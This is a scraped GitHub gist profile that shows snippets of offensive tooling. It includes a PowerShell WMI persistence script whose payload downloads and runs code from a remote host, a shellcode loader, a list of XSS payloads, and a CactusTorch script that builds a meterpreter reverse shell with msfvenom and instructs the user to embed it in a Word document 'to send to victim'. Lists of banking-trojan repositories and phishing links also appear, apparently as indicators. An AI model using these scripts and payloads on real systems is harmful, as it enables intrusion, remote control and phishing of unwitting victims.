Skip to content

Instantly share code, notes, and snippets.

Avatar

unload unexpectedBy

View GitHub Profile
View gist:ac1febb6e57ff84ebff2ba9c95485e2e
<#
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence. This script is an adaptation of his work.
#>
function Install-Persistence{
$Payload = "((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))"
$EventFilterName = 'Cleanup'
$EventConsumerName = 'DataCleanup'
$finalPayload = "powershell.exe -nop -c `"IEX $Payload`""
View windows-toolkit.md

Windows Toolkit

Binary

Native Binaries

IDA Plugins Preferred Neutral Unreviewed
@unexpectedBy
unexpectedBy / Numerics.cs
Created Mar 2, 2018
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
View Numerics.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
@unexpectedBy
unexpectedBy / XSS VECTORS
Created Jan 26, 2018
lista de vetores para xss
View XSS VECTORS
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
View CactusTorchDDEAUTO.sh
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
@unexpectedBy
unexpectedBy / gist:d41d2856a75e55d0d89f3be42227fb98
Created Oct 5, 2017
Github accounts with brazilian trojan banker
View gist:d41d2856a75e55d0d89f3be42227fb98
https://github.com/helio12ferreira22/casd12
https://github.com/helio12ferreira22/fdt4785
https://github.com/helio12ferreira22/NF2017
https://github.com/helio12ferreira22/arquivo-solicitado
https://github.com/helio12ferreira22/12
https://github.com/helio12ferreira22/sistemasefaz
https://github.com/emissaosefaz/atendimento.github.io
https://github.com/emissaosefaz/NE-fiscal
https://github.com/emissaosefaz/certbot
https://github.com/emissaosefaz/tests
@unexpectedBy
unexpectedBy / gist:cefc512c735b7a9770a2153c46178c49
Last active Aug 24, 2017
Campanha de phishings com encurtadores de url
View gist:cefc512c735b7a9770a2153c46178c49
http://bit.ly/1JNxVpN
http://bit.ly/1JHuoVh
http://bit.ly/1KdqJTQ
http://bit.ly/1kb9tuL
http://bit.ly/1JyLGX3
http://bit.ly/1jwS2fm
http://bit.ly/1jsQx0A
http://bit.ly/1KmT2K1
http://bit.ly/1kjulai
http://bit.ly/1kJ33cb
@unexpectedBy
unexpectedBy / facecheck2.0.php
Created Nov 16, 2015 — forked from googleinurl/facecheck2.0.php
Verificação de usuários Facebook 2.0
View facecheck2.0.php
<?php
/*
E d i ç ã o - 2.0 / 29-09-2015
--------------------------------------------------------------------------------
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
[+] Blog: http://blog.inurl.com.br
--------------------------------------------------------------------------------
*/
@unexpectedBy
unexpectedBy / minisqlmap.bs
Created Nov 16, 2015 — forked from googleinurl/minisqlmap.sh
MINI-EXPLOIT // SQLMAP
View minisqlmap.bs
#!/bin/bash
: '
MINI-EXPLOIT // SQLMAP ~
------------------------------------------------------
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
[+] EMAIL: inurlbr@gmail.com
[+] Blog: http://blog.inurl.com.br
[+] Twitter: https://twitter.com/googleinurl
You can’t perform that action at this time.